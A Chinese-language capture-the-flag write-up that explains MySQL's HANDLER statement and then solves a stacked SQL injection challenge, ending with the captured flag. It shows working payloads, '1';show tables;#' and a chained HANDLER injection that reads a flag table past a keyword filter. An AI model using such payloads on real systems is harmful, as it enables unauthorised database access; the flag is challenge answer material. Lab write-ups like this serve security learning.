文章目录
- 一、知识拓展
-
-
- 1、我在mi数据库中创建了一个数据表
- 2、使用handler读取数据
-
- 二、堆叠注入
-
-
- 1、检查源码
- 2、使用堆叠注入
-
- 1、判断是否存在注入点
- 2、使用堆叠注入
- 3、获取flag
-
一、知识拓展
mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据
1、我在mi数据库中创建了一个数据表
2、使用handler读取数据
总结下来就四条命令,不难,你们自己尝试动手一下,加深印象,handler打开后要关闭,没有关闭下次打不开
HANDLER mi open; 打开mi表
HANDLER mi read first; 阅读表中第一行内容
handler mi read next; 阅读表下一行内容
handler mi close; 关闭
二、堆叠注入
1、检查源码
拿到题目后,检查源码和往输入框输入数字,并没有得到有用信息
2、使用堆叠注入
1、判断是否存在注入点
2、使用堆叠注入
1';show tables;#
3、获取flag
1、使用SQL语句进行注入时发现过滤了好多关键字
2、使用handler
1';HANDLER FlagHere open;HANDLER FlagHere read first;HANDLER FlagHere close;#
flag{4e0d0c43-1ce4-42ac-8448-fdcec3ed2412}